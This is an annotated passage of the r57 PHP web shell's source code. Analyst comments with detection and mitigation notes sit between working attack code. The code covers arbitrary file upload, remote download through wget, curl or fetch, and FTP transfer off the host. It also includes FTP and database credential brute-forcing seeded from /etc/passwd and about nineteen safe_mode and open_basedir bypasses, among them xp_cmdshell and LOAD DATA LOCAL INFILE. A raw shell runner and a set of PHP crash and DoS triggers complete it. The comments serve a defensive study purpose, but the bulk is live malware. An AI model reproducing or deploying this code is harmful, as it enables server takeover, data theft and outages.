4910 @unlink($tempdir.'dpc.c');
4911
4912 $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
4913
4914 @unlink($tempdir.'dpc');
4915
4916 $_POST['cmd']="ps -aux | grep dpc";
4917
4918}
4919
4920
4921
// Analyst note: POST `alias` selects a predefined command from $aliases (defined outside this
// excerpt) and places it in $_POST['cmd']. Only keys present in that table are accepted, so
// the request shows the alias name while the command text appears in process-execution logs.
4922if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
4923
4924
4925
// Analyst note: multi-file upload. Up to 17 form fields named userfile0 ... userfile16 are
// moved into the directory given by POST `dir`. The stored name is the client-supplied file
// name, or POST `new_name` for the first slot. Neither is validated, so the destination is
// anywhere the web-server account can write.
// The loop reads $HTTP_POST_FILES, a legacy array that PHP no longer populates since 5.4;
// unless the script aliases it elsewhere, uploads only work on older interpreters.
// Detection: multipart POSTs with field names `userfile0`..`userfile16` to a single PHP file,
// and new executable content appearing in writable web directories.
4926for($upl=0;$upl<=16;$upl++)
4927
4928{
4929
4930 if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
4931
4932 if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
4933
4934 else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
4935
4936 @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
4937
4938 or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
4939
4940 }
4941
4942}
4943
4944
4945
// Analyst note: remote file retrieval ("download to server"). POST `with` picks the transport,
// `rem_file` is the source URL and `loc_file` the destination path. The fopen case fetches the
// URL inside PHP through file(); every other case builds a shell command for wget, fetch,
// lynx, links, GET or curl and leaves it in $_POST['cmd'] (the code that runs it is outside
// this excerpt). This is the usual route for staging further tooling on the host.
// Detection: the web-server account spawning wget/curl/lynx/links/fetch, or PHP itself opening
// outbound HTTP or FTP connections; both values appear in the POST body.
// Mitigation: allow_url_fopen=Off, and egress filtering or an authenticated forward proxy.
4946if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4947
4948{
4949
4950 switch($_POST['with'])
4951
4952 {
4953
4954 case 'fopen':
4955
 // Needs URL wrappers to be enabled; an empty or failed fetch writes nothing and reports nothing.
4956 $datafile = @implode("", @file($_POST['rem_file']));
4957
4958 if($datafile)
4959
4960 {
4961
4962 if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
4963
4964 }
4965
4966
4967
4968 $_POST['cmd'] = '';
4969
4970 break;
4971
 // The remaining cases wrap both values in double quotes only, so shell metacharacters
 // inside them are still interpreted when the command runs.
4972 case 'wget':
4973
4974 $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
4975
4976 break;
4977
4978 case 'fetch':
4979
4980 $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
4981
4982 break;
4983
4984 case 'lynx':
4985
4986 $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4987
4988 break;
4989
4990 case 'links':
4991
4992 $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4993
4994 break;
4995
4996 case 'GET':
4997
4998 $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
4999
5000 break;
5001
5002 case 'curl':
5003
5004 $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
5005
5006 break;
5007
5008 }
5009
5010}
5011
// Analyst note: FTP transfer feature (cmd == ftp_file_up or ftp_file_down).
// Server and optional port come from ftp_server_port ("host:port", port defaults to 21);
// login, password, remote path, local path and transfer mode are all taken from POST.
// The connection is made from the compromised host with PHP's ftp_* functions, so no
// external ftp client process appears. Detection therefore rests on network telemetry
// (outbound FTP control/data connections from the web tier) and on file-system audit.
// err() is defined outside this excerpt; it is called with 3 on connect failure and 4 on
// login failure.
5012if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
5013
5014 {
5015
5016 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5017
5018 if(empty($ftp_port)) { $ftp_port = 21; }
5019
5020 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5021
5022 if(!$connection) { err(3); }
5023
5024 else
5025
5026 {
5027
5028 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
5029
5030 else
5031
5032 {
5033
 // Download: when loc_file is just the current directory, the remote file's basename is
 // appended so the file lands inside $dir.
5034 if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
5035
 // Upload: sends a local file off the host. Treat as possible data exfiltration.
5036 if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
5037
5038 }
5039
5040 }
5041
5042 @ftp_close($connection);
5043
 // cmd is cleared so the command runner further down falls back to its default listing.
5044 $_POST['cmd'] = "";
5045
5046 }
5047
5048
5049
// Analyst note: pre-flight for the two credential-guessing features (ftp_brute, db_brute).
// For ftp_brute it checks that the target answers; for db_brute $connection is simply set
// to 1. It then loads the candidate list into $users through get_users() (defined outside
// this excerpt): from /etc/passwd when brute_method == 'passwd', or from the file named in
// $_POST['dictionary'] when brute_method == 'dic'. On any failure cmd is cleared, which
// disables the guessing loops later in the script.
// Detection: reads of /etc/passwd by the web-server account that are followed by
// authentication failures on FTP or database services.
5050if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
5051
5052 {
5053
5054 if($_POST['cmd']=="ftp_brute"){
5055
5056 list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
5057
5058 if(empty($ftp_port)) { $ftp_port = 21; }
5059
5060 $connection = @ftp_connect ($ftp_server,$ftp_port,10);
5061
5062 }else if($_POST['cmd']=="db_brute"){
5063
5064 $connection = 1;
5065
5066 }
5067
5068 if(!$connection) { err(3); $_POST['cmd'] = ""; }
5069
5070 else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5071
5072 else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
5073
5074 if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
5075
5076 }
5077
5078
5079
// Analyst note: opens the report area and picks a default action when no cmd was posted:
// a directory listing command ("dir" on non-Unix, "ls -lia" otherwise) when $safe_mode is
// off, or the internal "safe_dir" lister when it is on. $safe_mode, $unix, $font and
// $table_up3 are set outside this excerpt.
// The current cmd value is echoed into the page without HTML escaping.
5080echo $table_up3;
5081
5082if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
5083
5084else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
5085
5086echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
5087
// Analyst note: this switch is the restricted-environment toolbox. It only runs when
// $safe_mode or $open_basedir (both set outside this excerpt) is truthy.
//   safe_dir          - directory listing through scandir()/dir()/opendir(), falling back
//                       to name enumeration via glob() warnings or realpath() probing.
//   test1 .. test19   - read, include or write a POST-supplied path through PHP extensions
//                       and stream wrappers (curl, include, mysql/mysqli LOAD DATA LOCAL
//                       INFILE, mssql xp_cmdshell, mb_send_mail, imap, zip and bzip2
//                       wrappers, error_log, session save path, a symlink race).
// Host and database indicators visible in the cases below: tables named temp_r57_table and
// r57_temp_table that are created and dropped within one request, and files named
// symlinkread and dummy in the script's working directory.
// Defensive takeaway: safe_mode and open_basedir were never a reliable isolation boundary
// (safe_mode was removed in PHP 5.4). Isolate sites with separate OS accounts and
// containers, keep local_infile and xp_cmdshell disabled on the database side, and load
// only the PHP extensions the application needs.
5088if($safe_mode || $open_basedir)
5089
5090{
5091
5092 switch($_POST['cmd'])
5093
5094 {
5095
5096 case 'safe_dir':
5097
5098
5099
5100 if (@function_exists('scandir') && ($d=@scandir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5101
5102 {
5103
5104 foreach ($d as $file)
5105
5106 {
5107
5108 if ($file=="." || $file=="..") continue;
5109
5110 @clearstatcache();
5111
5112 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5113
5114 if(!$unix){
5115
5116 echo date("d.m.Y H:i",$mtime);
5117
5118 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5119
5120 }
5121
5122 else{
5123
5124 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5125
5126 $owner = @posix_getpwuid($uid);
5127
5128 $grgid = @posix_getgrgid($gid);
5129
5130 }else{$owner['name']=$grgid['name']='';}
5131
5132 echo $inode." ";
5133
5134 echo perms(@fileperms($file));
5135
5136 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5137
5138 echo @date("d.m.Y H:i ",$mtime);
5139
5140 }
5141
5142 echo "$file\n";
5143
5144 }
5145
5146 }
5147
5148
5149
5150 elseif (@function_exists('dir') && ($d=@dir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5151
5152 {
5153
5154 while (false!==($file=$d->read()))
5155
5156 {
5157
5158 if ($file=="." || $file=="..") continue;
5159
5160 @clearstatcache();
5161
5162 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5163
5164 if(!$unix){
5165
5166 echo date("d.m.Y H:i",$mtime);
5167
5168 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5169
5170 }
5171
5172 else{
5173
5174 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5175
5176 $owner = @posix_getpwuid($uid);
5177
5178 $grgid = @posix_getgrgid($gid);
5179
5180 }else{$owner['name']=$grgid['name']='';}
5181
5182 echo $inode." ";
5183
5184 echo perms(@fileperms($file));
5185
5186 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5187
5188 echo @date("d.m.Y H:i ",$mtime);
5189
5190 }
5191
5192 echo "$file\n";
5193
5194 }
5195
5196 $d->close();
5197
5198 }
5199
5200
5201
5202 elseif (@function_exists('opendir') && @function_exists('readdir') && ($d=@opendir($dir)) && !isset($_POST['glob']) && !isset($_POST['realpath']))
5203
5204 {
5205
5206 while (false!==($file=@readdir($d)))
5207
5208 {
5209
5210 if ($file=="." || $file=="..") continue;
5211
5212 @clearstatcache();
5213
5214 @list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
5215
5216 if(!$unix){
5217
5218 echo date("d.m.Y H:i",$mtime);
5219
5220 if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
5221
5222 }
5223
5224 else{
5225
5226 if(@function_exists('posix_getpwuid') && @function_exists('posix_getgrgid')){
5227
5228 $owner = @posix_getpwuid($uid);
5229
5230 $grgid = @posix_getgrgid($gid);
5231
5232 }else{$owner['name']=$grgid['name']='';}
5233
5234 echo $inode." ";
5235
5236 echo perms(@fileperms($file));
5237
5238 @printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
5239
5240 echo @date("d.m.Y H:i ",$mtime);
5241
5242 }
5243
5244 echo "$file\n";
5245
5246 }
5247
5248 @closedir($d);
5249
5250 }
5251
5252
5253
5254 elseif(@function_exists('glob') && (isset($_POST['glob']) || !isset($_POST['realpath'])))
5255
5256 {
5257
5258 echo "PHP glob() listing directory Safe_mode bypass Exploit\r\n\r\n";
5259
5260 function eh($errno, $errstr, $errfile, $errline)
5261
5262 {
5263
5264 global $D, $c, $i;
5265
5266 preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
5267
5268 if($o){ $D[$c] = $o[2]; $c++;}
5269
5270 }
5271
5272 $error_reporting = @ini_get('error_reporting');
5273
5274 error_reporting(E_WARNING);
5275
5276 @ini_set("display_errors", 1);
5277
5278 @ini_alter("display_errors", 1);
5279
5280 $root = "/";
5281
5282 if($dir) $root = $dir;
5283
5284 $c = 0; $D = array();
5285
5286 @set_error_handler("eh");
5287
5288 $chars = "_-.0123456789abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
5289
5290 for($i=0; $i < strlen($chars); $i++)
5291
5292 {
5293
5294 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
5295
5296 $prevD = $D[count($D)-1];
5297
5298 @glob($path."*");
5299
5300 if($D[count($D)-1] != $prevD)
5301
5302 {
5303
5304 for($j=0; $j < strlen($chars); $j++)
5305
5306 {
5307
5308 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
5309
5310 $prevD2 = $D[count($D)-1];
5311
5312 @glob($path."*");
5313
5314 if($D[count($D)-1] != $prevD2)
5315
5316 {
5317
5318 for($p=0; $p < strlen($chars); $p++)
5319
5320 {
5321
5322 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
5323
5324 $prevD3 = $D[count($D)-1];
5325
5326 @glob($path."*");
5327
5328 if($D[count($D)-1] != $prevD3)
5329
5330 {
5331
5332 for($r=0; $r < strlen($chars); $r++)
5333
5334 {
5335
5336 $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
5337
5338 @glob($path."*");
5339
5340 }
5341
5342 }
5343
5344 }
5345
5346 }
5347
5348 }
5349
5350 }
5351
5352 }
5353
5354 $D = array_unique($D);
5355
5356 foreach($D as $item) echo "{$item}\r\n";
5357
5358 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5359
5360 error_reporting($error_reporting);
5361
5362 }
5363
5364 elseif(@function_exists('realpath') && (!isset($_POST['glob']) || isset($_POST['realpath'])))
5365
5366 {
5367
5368 echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
5369
5370 if(!$dir){$dir='/etc/';};
5371
5372 if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
5373
5374 if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
5375
5376
5377
5378 if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
5379
5380 if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
5381
5382 foreach($presets_rlph as $preset_rlph){
5383
5384 if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
5385
5386 }
5387
5388 for($i=0; $i < strlen($chars_rlph); $i++){
5389
5390 if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
5391
5392 if($n_rlph<=1){continue;};
5393
5394 for($j=0; $j < strlen($chars_rlph); $j++){
5395
5396 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
5397
5398 if($n_rlph<=2){continue;};
5399
5400 for($x=0; $x < strlen($chars_rlph); $x++){
5401
5402 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
5403
5404 if($n_rlph<=3){continue;};
5405
5406 for($y=0; $y < strlen($chars_rlph); $y++){
5407
5408 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}".$end_rlph)){echo $realpath."\r\n";}
5409
5410 if($n_rlph<=4){continue;};
5411
5412 for($z=0; $z < strlen($chars_rlph); $z++){
5413
5414 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}".$end_rlph)){echo $realpath."\r\n";}
5415
5416 if($n_rlph<=5){continue;};
5417
5418 for($w=0; $w < strlen($chars_rlph); $w++){
5419
5420 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}{$chars_rlph[$y]}{$chars_rlph[$z]}{$chars_rlph[$w]}".$end_rlph)){echo $realpath."\r\n";}
5421
5422 }
5423
5424 }
5425
5426 }
5427
5428 }
5429
5430 }
5431
5432 }
5433
5434 echo "\r\n Generation time: ".round(@getmicrotime()-starttime,4)." sec\r\n";
5435
5436 }
5437
5438 else echo $lang[$language.'_text29'];
5439
5440 break;
5441
5442 case 'test1':
5443
5444 $ci = @curl_init("file://".$_POST['test1_file']);
5445
5446 $cf = @curl_exec($ci);
5447
5448 echo htmlspecialchars($cf);
5449
5450 break;
5451
5452 case 'test2':
5453
5454 @include($_POST['test2_file']);
5455
5456 break;
5457
5458 case 'test3':
5459
5460 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
5461
5462 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
5463
5464 if($db)
5465
5466 {
5467
5468 if(@mysql_select_db($_POST['test3_md'],$db))
5469
5470 {
5471
5472 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5473
5474 @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
5475
5476/* @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");*/
5477
5478 @mysql_query("LOAD DATA LOCAL INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
5479
5480 $r = @mysql_query("SELECT * FROM temp_r57_table");
5481
5482 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5483
5484 @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
5485
5486 }
5487
5488 else echo "[-] ERROR! Can't select database";
5489
5490 @mysql_close($db);
5491
5492 }
5493
5494 else echo "[-] ERROR! Can't connect to mysql server";
5495
5496 break;
5497
5498 case 'test4':
5499
5500 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
5501
5502 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
5503
5504 if($db)
5505
5506 {
5507
5508 if(@mssql_select_db($_POST['test4_md'],$db))
5509
5510 {
5511
5512 @mssql_query("drop table r57_temp_table",$db);
5513
5514 @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
5515
5516 @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
5517
5518 $res = mssql_query("select * from r57_temp_table",$db);
5519
5520 while(($row=@mssql_fetch_row($res)))
5521
5522 {
5523
5524 echo htmlspecialchars($row[0])."\r\n";
5525
5526 }
5527
5528 @mssql_query("drop table r57_temp_table",$db);
5529
5530 }
5531
5532 else echo "[-] ERROR! Can't select database";
5533
5534 @mssql_close($db);
5535
5536 }
5537
5538 else echo "[-] ERROR! Can't connect to MSSQL server";
5539
5540 break;
5541
5542 case 'test5':
5543
5544 $temp=tempnam($dir, "fname");
5545
5546 if (@file_exists($temp)) @unlink($temp);
5547
5548 $extra = "-C ".$_POST['test5_file']." -X $temp";
5549
5550 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
5551
5552 $str = moreread($temp);
5553
5554 echo htmlspecialchars($str);
5555
5556 @unlink($temp);
5557
5558 break;
5559
5560 case 'test6':
5561
5562 $stream = @imap_open('/etc/passwd', "", "");
5563
5564 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
5565
5566 for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";
5567
5568 @imap_close($stream);
5569
5570 break;
5571
5572 case 'test7':
5573
5574 $stream = @imap_open($_POST['test7_file'], "", "");
5575
5576 $str = @imap_body($stream, 1);
5577
5578 echo htmlspecialchars($str);
5579
5580 @imap_close($stream);
5581
5582 break;
5583
5584 case 'test8':
5585
5586 $temp=@tempnam($_POST['test8_file2'], "copytemp");
5587
5588 $str = readzlib($_POST['test8_file1'],$temp);
5589
5590 echo htmlspecialchars($str);
5591
5592 @unlink($temp);
5593
5594 break;
5595
5596 case 'test9':
5597
5598 @ini_restore("safe_mode");
5599
5600 @ini_restore("open_basedir");
5601
5602 $str = moreread($_POST['test9_file']);
5603
5604 echo htmlspecialchars($str);
5605
5606 break;
5607
5608 case 'test10':
5609
5610 @ob_clean();
5611
5612 $error_reporting = @ini_get('error_reporting');
5613
5614 error_reporting(E_ALL ^ E_NOTICE);
5615
5616 @ini_set("display_errors", 1);
5617
5618 @ini_alter("display_errors", 1);
5619
5620 $str=@fopen($_POST['test10_file'],"r");
5621
5622 while(!feof($str)){print htmlspecialchars(fgets($str));}
5623
5624 fclose($str);
5625
5626 error_reporting($error_reporting);
5627
5628 break;
5629
5630 case 'test11':
5631
5632 @ob_clean();
5633
5634 $temp = 'zip://'.$_POST['test11_file'];
5635
5636 $str = moreread($temp);
5637
5638 echo htmlspecialchars($str);
5639
5640 break;
5641
5642 case 'test12':
5643
5644 @ob_clean();
5645
5646 $temp = 'compress.bzip2://'.$_POST['test12_file'];
5647
5648 $str = moreread($temp);
5649
5650 echo htmlspecialchars($str);
5651
5652 break;
5653
5654 case 'test13':
5655
5656 @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);
5657
5658 echo $lang[$language.'_text61'];
5659
5660 break;
5661
5662 case 'test14':
5663
5664 @session_save_path($_POST['test14_file2']."\0;$tempdir");
5665
5666 @session_start();
5667
5668 @$_SESSION[php]=$_POST['test14_file1'];
5669
5670 echo $lang[$language.'_text61'];
5671
5672 break;
5673
5674 case 'test15':
5675
5676 @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);
5677
5678 echo $lang[$language.'_text61'];
5679
5680 break;
5681
5682 case 'test16':
5683
5684 if (@fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];
5685
5686 break;
5687
5688 case 'test17_1':
5689
5690 @unlink('symlinkread');
5691
5692 @symlink('a/a/a/a/a/a/', 'dummy');
5693
5694 @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');
5695
5696 @unlink('dummy');
5697
5698 while (1)
5699
5700 {
5701
5702 @symlink('.', 'dummy');
5703
5704 @unlink('dummy');
5705
5706 }
5707
5708 break;
5709
5710 case 'test17_2':
5711
5712 $str='';
5713
5714 while (strlen($str) < 3) {
5715
5716/* $str = moreread('symlinkread');*/
5717
5718 $str = @file_get_contents('symlinkread');
5719
5720 if($str){ @ob_clean(); echo htmlspecialchars($str);}
5721
5722 }
5723
5724 break;
5725
5726 case 'test17_3':
5727
5728 $dir = $files = array();
5729
5730 if(@version_compare(@phpversion(),"5.0.0")>=0){
5731
5732 while (@count($dir) < 3) {
5733
5734 $dir=@scandir('symlinkread');
5735
5736 if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }
5737
5738 }
5739
5740 }
5741
5742 else {
5743
5744 while (@count($files) < 3) {
5745
5746 $dh = @opendir('symlinkread');
5747
5748 while (false !== ($filename = @readdir($dh))) {
5749
5750 $files[] = $filename;
5751
5752 }
5753
5754 if(@count($files) > 2){@ob_clean(); @print_r($files); }
5755
5756 }
5757
5758 }
5759
5760 break;
5761
5762 case 'test18':
5763
5764 @putenv("TMPDIR=".$_POST['test18_file2']);
5765
5766 @ini_set("session.save_path", "");
5767
5768 @ini_alter("session.save_path", "");
5769
5770 @session_start();
5771
5772 @$_SESSION[php]=$_POST['test18_file1'];
5773
5774 echo $lang[$language.'_text61'];
5775
5776 break;
5777
5778 case 'test19':
5779
5780 if(empty($_POST['test19_port'])) { $_POST['test19_port'] = "3306"; }
5781
5782 $m = new mysqli('localhost',$_POST['test19_ml'],$_POST['test19_mp'],$_POST['test19_md'],$_POST['test19_port']);
5783
5784 if(@mysqli_connect_errno()){ echo "[-] ERROR! Can't connect to mysqli server: ".mysqli_connect_error() ;};
5785
5786 $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
5787
5788 $m->set_local_infile_handler("r");
5789
5790 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5791
5792 $m->query("CREATE TABLE temp_r57_table ( 'file' LONGBLOB NOT NULL )");
5793
5794 $m->query("LOAD DATA LOCAL INFILE \"".$_POST['test19_file']."\" INTO TABLE temp_r57_table");
5795
5796 $r = $m->query("SELECT * FROM temp_r57_table");
5797
5798 while(($r_sql = @mysqli_fetch_array($r))) { echo @htmlspecialchars($r_sql[0])."\r\n"; }
5799
5800 $m->query("DROP TABLE IF EXISTS temp_r57_table");
5801
5802 $m->close();
5803
5804 break;
5805
5806 }
5807
5808}
5809
5810
5811
// Analyst note: the generic command runner. Unless $safe_mode is on or cmd names one of the
// internally handled actions (php_eval, mysql_dump, db_query, ftp_brute, db_brute), the raw
// $_POST['cmd'] string is passed to ex() (defined outside this excerpt; presumably a
// shell-execution wrapper) and the output is HTML-escaped into the report textarea.
// On non-Unix hosts the output is first run through convert_cyr_string(..., 'd', 'w').
// Detection: shell or cmd.exe child processes of the web server or PHP worker, and POST
// requests whose cmd field holds command-line text. Mitigation: disabling the process
// execution functions in php.ini removes this path, and file-integrity monitoring on the
// web root catches the script itself.
// The block comment that follows is a disabled safe_mode variant that would call safe_ex().
5812if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){
5813
5814 $cmd_rep = ex($_POST['cmd']);
5815
5816 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5817
5818 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5819
5820}/*elseif($safe_mode){
5821
5822 $cmd_rep = safe_ex($_POST['cmd']);
5823
5824 if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
5825
5826 else { echo @htmlspecialchars($cmd_rep)."\n"; }
5827
5828}
5829
5830*/
5831
// Analyst note: cases dos1 .. dos38 below are a catalogue of interpreter-crash and
// resource-exhaustion triggers. Each one either recurses or loops without bound, or calls a
// PHP built-in or extension function with oversized or malformed arguments; dos8 instead
// shells out to signal the httpd processes. None of them produce useful output, so the
// apparent purpose is to take the PHP worker or web server down.
// Detection: POST requests with cmd=dosN, followed by worker segfaults, memory-limit or
// max-execution-time errors in the server log. Mitigation: current PHP releases, sane
// memory_limit and max_execution_time values, and per-site worker pools so one crash does
// not affect other tenants.
5832switch($_POST['cmd'])
5833
5834{
5835
5836 case 'dos1':
5837
5838 function a() { a(); } a();
5839
5840 break;
5841
5842 case 'dos2':
5843
5844 @pack("d4294967297", 2);
5845
5846 break;
5847
5848 case 'dos3':
5849
5850 $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));
5851
5852 break;
5853
5854 case 'dos4':
5855
5856 $t = array(1);while (1) {$a[] = &$t;};
5857
5858 break;
5859
5860 case 'dos5':
5861
5862 @dl("sqlite.so");$db = new SqliteDatabase("foo");
5863
5864 break;
5865
5866 case 'dos6':
5867
5868 preg_match('/(.(?!b))*/', @str_repeat("a", 10000));
5869
5870 break;
5871
5872 case 'dos7':
5873
5874 @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));
5875
5876 break;
5877
5878 case 'dos8':
5879
5880 @shell_exec("killall -11 httpd");
5881
5882 break;
5883
5884 case 'dos9':
5885
5886 function cx(){ @tempnam("/www/", '../../../../../..'.$tempdir.'cx'); cx(); } cx();
5887
5888 break;
5889
5890 case 'dos10':
5891
5892 $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);
5893
5894 break;
5895
5896 case 'dos11':
5897
5898 @array_fill(1,123456789,"Infigo-IS");
5899
5900 break;
5901
5902 case 'dos12':
5903
5904 @substr_compare("A","A",12345678);
5905
5906 break;
5907
5908 case 'dos13':
5909
5910 @unserialize("a:2147483649:{");
5911
5912 break;
5913
5914 case 'dos14':
5915
5916 $Data = @str_ireplace("\n", "<br>", $Data);
5917
5918 break;
5919
5920 case 'dos15':
5921
5922 function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}
5923
5924 $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}
5925
